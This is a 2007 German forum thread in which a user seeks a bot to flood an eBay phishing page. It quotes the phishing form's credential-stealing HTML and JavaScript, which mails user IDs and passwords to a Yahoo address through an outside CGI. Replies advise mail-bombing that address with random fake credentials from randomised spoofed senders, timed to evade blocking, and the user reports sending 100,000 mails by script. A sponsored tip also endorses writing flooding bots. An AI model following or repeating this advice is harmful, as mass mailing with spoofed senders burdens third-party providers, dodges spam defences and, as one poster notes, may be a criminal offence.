Brauche einen Bot

Ich suche ein Script, mit dem ich so ein paar blöden Phishern mal etwas die Tour vermasseln kann.

Unten ist ein Link zu so einer Seite.

Vorsicht: Seite will Ebay Passwörter haben, also nichts dort eintragen!
http://slupsk.slp.vectranet.pl/~dominik/.r...om/redirect.htm

Da dort keine Zeitsperre drauf ist, würde ich dort gerne sehr schnell das Formular mit Werten bestücken und sofort abschicken. Da er die Werte sicher in einer Datenbank speichert, bekommt man die sicher schnell zum Überlauf.

Zwar ganz gut gemacht, aber die Adresse in der Statuszeile zeigt schon wo es hingeht.
Wer möchte kann ihm ja ein paar nette Einträge mit Doofkopp oder so hinterlegen.

Sehe gerade, der geht per Mail Script an eine bestimmt Adresse. Heißt, da kann man ihm das Mailfach bei Yahoo zuknallen.

Bearbeitet von tom-kuehn am 12.06.2007 13:40:26
Profilbild
Tipp von Bernhard aus der Redaktion:

Ein Buch über das Programmieren mit Python könnte dir helfen, ein Script zu entwickeln, das automatisierte Eingaben auf Websites vornimmt. Damit kannst du lernen, wie man solche Bots schreibt, um unerwünschte Phishing-Seiten gezielt mit Fake-Daten zu fluten.

Math Adventures with Python: An Illustrated Guide to Exploring Math with Code direkt bei Amazon entdecken für 20,99 €! [Anzeige]

So, die Form dahinter sieht so aus:

CODE

<form name="frmcadastro" action="http://www2.fiberbit.net/form/mailto.cgi" method="post" enctype="x-www-form-urlencoded">
<input name="Mail_From" value="Yahoo" type="hidden">
<input name="Mail_To" value="gingerregnigg3@yahoo.com" type="hidden">
<input name="Mail_Subject" type="hidden">

<script language=javascript>
function check(form) {
var user = document.frmcadastro.userid.value;
var parola = document.frmcadastro.pass.value;
document.frmcadastro.Mail_Subject.value = user + " && " + parola;
form.submit();}
</script>

<input name="Next_Page" value="http://feedback.ebay.com/ws/eBayISAPI.dll?ViewFeedback&userid=automony " type="hidden">
<input name="SMAUTHREASON" value="0" type="hidden">
<input name="TARGET" value="http://pages.ebay.com/q" type="hidden">
<INPUT tabIndex=1 maxLength=64 size=27 name=userid>
<INPUT tabIndex=2 type=password maxLength=64 size=27 name=pass>
<INPUT tabIndex=3 type=submit onclick="check(this.form); return false;" value="Sicheres Einloggen >">
<INPUT tabIndex=4 type=checkbox value=1 name=keepMeSignInOption>

</form>


Wie bringe ich nun die Daten an das cgi Script?
Gefällt dir dieser Beitrag?
Kannst du eventuell etwas mit dem Quelltext anfangen ?

Den könnte ich dir geben, ls
Gefällt dir dieser Beitrag?
Zitat (Archimeda1 @ 12.06.2007 15:04:36)
Kannst du eventuell etwas mit dem Quelltext anfangen ?

Den könnte ich dir geben, ls

Nun ja, ist ein Post. Ich denke mal, es müssen alle Parameter mit rein also etwa:

http://www2.fiberbit.net/form/mailto.cgi?M...eSignInOption=1

So in etwa, geht aber nicht.

Wenn ich einen funktionierenden Link hätte. könnte ich den per PHP immer wieder aufrufen, aber ich bekomme immer nur eine Fehlermeldung.

Bearbeitet von tom-kuehn am 12.06.2007 15:19:17
Gefällt dir dieser Beitrag?
Die Seite wird bei mir leider nicht angezeigt. Im Quelltext kannst du aber erkennen, woher es stammt.
Gefällt dir dieser Beitrag?
Quelltext:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html; charset=ISO-8859-1"
http-equiv="content-type">
<title></title>
</head>
<body>
&lt;form name="frmcadastro"
action="http://www2.fiberbit.net/form/mailto.cgi&quot; method="post"
enctype="x-www-form-urlencoded"&gt;<br>
&lt;input name="Mail_From" value="Yahoo" type="hidden"&gt;<br>
&lt;input name="Mail_To" value="gingerregnigg3@yahoo.com"
type="hidden"&gt;<br>
&lt;input name="Mail_Subject" type="hidden"&gt;<br>
<br>
&lt;script language=javascript&gt;<br>
function check(form) {<br>
var user = document.frmcadastro.userid.value;<br>
var parola = document.frmcadastro.pass.value;<br>
document.frmcadastro.Mail_Subject.value = user + " &amp;&amp; "
+ parola;<br>
form.submit();}<br>
&lt;/script&gt;<br>
<br>
&lt;input name="Next_Page"
value="http://feedback.ebay.com/ws/eBayISAPI.dll?ViewFeedback&amp;userid=automony
" type="hidden"&gt;<br>
&lt;input name="SMAUTHREASON" value="0" type="hidden"&gt;<br>
&lt;input name="TARGET" value="http://pages.ebay.com/q&quot;
type="hidden"&gt;<br>
&lt;INPUT tabIndex=1 maxLength=64 size=27 name=userid&gt;<br>
&lt;INPUT tabIndex=2 type=password maxLength=64 size=27
name=pass&gt;<br>
&lt;INPUT tabIndex=3 type=submit onclick="check(this.form); return
false;" value="Sicheres Einloggen &gt;"&gt;<br>
&lt;INPUT tabIndex=4 type=checkbox value=1
name=keepMeSignInOption&gt;<br>
<br>
&lt;/form&gt;<br>
</body>
</html>
Gefällt dir dieser Beitrag?
Mir ist schon klar was dort passiert: Die Form wird samt Inhalten an das cgi übergeben. UserID und Passwort aus den Inputs werden als Mail_Subject übergeben und das cgi wird sehr wahrscheinlich an gingerregnigg3@yahoo.com gemailt.

Dummerweise ist mein Chinesisch etwas eingerostet, fiberbit sieht seht asiatisch aus und da komme ich nicht weiter.
Gefällt dir dieser Beitrag?
Wie, du kannst kein chinesisch ??? :rolleyes:

In meinem Forum kannst du das online erlernen *bg

:blumen:
Gefällt dir dieser Beitrag?
Auch wenn ich voll hinter Dir stehe tom-kuehn. Das was Du versuchst ist ne Art Sachbeschädigung. Mir fällt grad das richtige Wort nicht ein. Aber es würde den Tatbestand einer Straftat erfüllen. Ok, so ein Typ würde Dich wohl nicht anzeigen. Aber behalt das mal im Hinterkopf.

Die Form, die Du gepostet hast versendet die Daten als POST. Das heißt, Du kannst eben keinen Link zusammenbasteln, wie Du es versucht hast. Denn das wäre die GET Methode. Was Du machen kannst wäre folgendes:
Du überspringst einfach diese blöde Form, und sendest eine unendliche Zahl an Mails an diese Adresse, mit dem Subjekt "username&&passwort" wobei die beiden Worte aus nem Zufallsgenerator kommen.
Ich denke nämlich, die Seite bei fiberbit macht nix anderes, als die Mail zu erstellen, und zu versenden.

PS: Vergiß nicht, daß Du Deine absende-mailadresse auch veränderst, und evtl durch nen zufallsgenerator jagst. Sonst bockt er Dich einfach als Spam.

Bearbeitet von Wyvern am 13.06.2007 10:00:46
Gefällt dir dieser Beitrag?
Zitat (Wyvern @ 13.06.2007 09:59:09)
Aber es würde den Tatbestand einer Straftat erfüllen. Ok, so ein Typ würde Dich wohl nicht anzeigen.

Ob Spammails verschicken eine Straftat ist? Weiß nicht, aber ich denke wirklich nicht, dass er mich anzeigen würde.

Ich habs mal mit Mail versucht. Per php Script erstmal 100.000 Stück, die gingen zumindest durch.
Gefällt dir dieser Beitrag?
Das Problem ist nun, daß das Versenden der Mails Bandbreite und Rechnerleistung bei den Providern frißt. Das wäre durchaus auch ne Art Sachbeschädigung. Wenn die wollen, dann könnten sie Dir evtl auf die Pfoten klopfen. Aber nach dem, was ich so täglich an Spam bekomme sind Deine 100.000 Mails nicht so wirklich schlimm.

Du könntest Dir jetzt noch den Spaß machen, und diese Mails nicht als Block, sondern Zeitverzögert über den ganzen Tag verteilt versenden. Dann kann er auch nicht einfach nen Zeitraum blocken.
Gefällt dir dieser Beitrag?
Neues ThemaUmfrage

Passende Tipps
Adventskalender als Türkranz
Adventskalender als Türkranz
10 8
Glückwunschkarte zur Versetzung in die nächste Klasse
Glückwunschkarte zur Versetzung in die nächste Klasse
12 7
Haushaltsorganisation - mit Körbchen
Haushaltsorganisation - mit Körbchen
21 10
Verschmutzes Doppelrollo (Duorollo) kürzen
Verschmutzes Doppelrollo (Duorollo) kürzen
9 28
Befestigungsclip für Wandlampe selber nachbauen
Befestigungsclip für Wandlampe selber nachbauen
6 3
Erstes Tattoo – was muss ich wissen?
Erstes Tattoo – was muss ich wissen?
13 46
Verbrauch halbieren bei Spülmittel, Gewürzen & Co
Verbrauch halbieren bei Spülmittel, Gewürzen & Co
11 11
Rinderbrühe auf Vorrat herstellen
Rinderbrühe auf Vorrat herstellen
16 12
Powered by Invision Power Board(U) v1.2 © 2003 IPS, Inc.